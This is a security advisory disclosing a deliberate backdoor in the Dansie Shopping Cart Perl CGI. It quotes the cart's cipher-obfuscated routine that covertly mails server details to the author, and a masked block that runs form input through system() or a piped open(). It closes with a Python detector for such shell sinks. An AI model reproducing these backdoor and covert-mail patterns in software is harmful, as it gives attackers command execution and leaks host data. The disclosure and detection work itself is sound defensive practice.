
Dansie Cart Script Exploit Reported



Synopsis : This program -deliberately- allows arbitrary commands to be
          executed on the victim server.


One of our clients, while installing and configuring the Dansie Shopping
Cart, ran into difficulty integrating PGP, the shopping cart program, and
our secure server setup.  While trying to assist our client with the cart
and PGP configuration we discovered a couple of things.

The CGI, under certain conditions, sends an email to the author of the
Dansie shopping cart software, 'tech@xxxxxxxxxx'.  This is not readily
apparent as the code that handles this transaction incorporates a simple
Caesar Cipher to hide the email address. The cipher is handled via the
subroutine 'there2':

------
sub there2
{
   $_ = "$_[0]";
   tr/a-z0-9/gvibn9wprud2lmx8z3fa4eq15oy06sjc7kth/;
   tr/_/-/;
   tr/\@/\./;
   return $_;
}
-------

The call that creates this email address and sends the mail is the
function 'there3'.

-------
sub there3
{
   if (($ENV{'OS'} !~ /Windows_NT/i) && ($mailprog) && (-e "$mailprog"))
   {
       $a = &there2('8v59')."\@".&there2('kte3cv').".".&there2('ev8');
       $b = &there2('8v59_3jhhzi8');
       pop(@there2);
       pop(@there2);
       $c = &there2("@there2");
       open (TECH, "|$mailprog $a");
       print TECH "To: $a\n";
       print TECH "From: $a\n";
       print TECH "Subject: $b\n\n";
       print TECH "$path3\n";
       print TECH "$ENV{'HTTP_HOST'} $ENV{'SERVER_NAME'}\n";
       print TECH "$c\n";
       print TECH "$e $there\n" if ($e);
       close (TECH);
   }
}
-------

The ciphered strings, when passed through 'there2', result in:

  8v59          == tech
  kte3cv        == dansie
  ev8           == net
  8v59_3jhhzi8  == tech-support
  $a            == tech@xxxxxxxxxx
  $b            == Subject: tech-support

This seems curious, but plausible reasons could include ensuring license
compliance, or maybe the cart automatically sends this email when an error
occurs. The program definitely goes out of its way to hide the fact that the
mail is being sent.

While going through the rest of the code we discovered a much more
interesting item.

(We've masked out the actual trigger element with question marks)

----------
if ( ( ($FORM{'?????????'}) && ($ENV{'HTTP_HOST'} !~ /($d)/) )
     || ( ($FORM{'?????????'}) && (!$d) ) )
{
   if ( $ENV{'OS'} )
   {
       system("$FORM{'?????????'}");
   }
   else
   {
       open(ELIF,"|$FORM{'?????????'}");
   }
   exit;
}
--------
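The construct above is easy to spot mechanically once you know what to look
for: a form value handed directly to system(), exec(), a piped open() or a
backtick expression. The following is an added example written for this post,
not code from the Dansie cart or from the original author; the function
find_form_shell_sinks, the SHELL_SINK_PATTERNS list and the SAMPLE_CGI text are
ours, the sample being constructed from the snippet quoted above (trigger
element still masked) with two benign lines added to show they are not flagged.

```python
import re

# Each entry pairs a description with a regex matching a Perl construct that
# hands the shell a string built from the CGI's form hash ($FORM{...}).
# Matching is line-based, which is enough for the style of code quoted here.
SHELL_SINK_PATTERNS = [
    ("system() with form-controlled command",
     re.compile(r'\bsystem\s*\(\s*"?\s*\$FORM\{')),
    ("exec() with form-controlled command",
     re.compile(r'\bexec\s*\(\s*"?\s*\$FORM\{')),
    ("open() to a pipe whose command comes from the form",
     re.compile(r'\bopen\s*\([^,]+,\s*"\|\s*\$FORM\{')),
    ("backtick command built from the form",
     re.compile(r'`[^`]*\$FORM\{[^`]*`')),
]


def find_form_shell_sinks(perl_source: str) -> list:
    """Return (line number, description, stripped line) for each suspicious line.

    Line numbers are 1-based so they can be quoted back to the script's owner.
    """
    findings = []
    for lineno, line in enumerate(perl_source.splitlines(), start=1):
        for description, pattern in SHELL_SINK_PATTERNS:
            if pattern.search(line):
                findings.append((lineno, description, line.strip()))
    return findings


# Constructed sample: the quoted block, preceded by a normal header print and a
# three-argument open() that reads nothing from the form.
SAMPLE_CGI = r"""
print "Content-type: text/html\n\n";
open(LOG, ">>", $logfile) or die "cannot open log";
if ( ( ($FORM{'?????????'}) && ($ENV{'HTTP_HOST'} !~ /($d)/) ) || ( ($FORM{'?????????'}) && (!$d) ) )
{
    if ( $ENV{'OS'} )
    {
        system("$FORM{'?????????'}");
    }
    else
    {
        open(ELIF,"|$FORM{'?????????'}");
    }
    exit;
}
"""

if __name__ == "__main__":
    for lineno, description, text in find_form_shell_sinks(SAMPLE_CGI):
        print(f"line {lineno}: {description}\n    {text}")
```

On the sample this reports exactly the two lines that matter, the system() call
taken on Windows and the piped open() taken everywhere else, and stays quiet on
the header print and the log file open. A check like this belongs in the review
of any third-party CGI before it is deployed, since the surrounding condition
(a hostname test against $d) is precisely the kind of gate that keeps the
behaviour from showing up in ordinary testing.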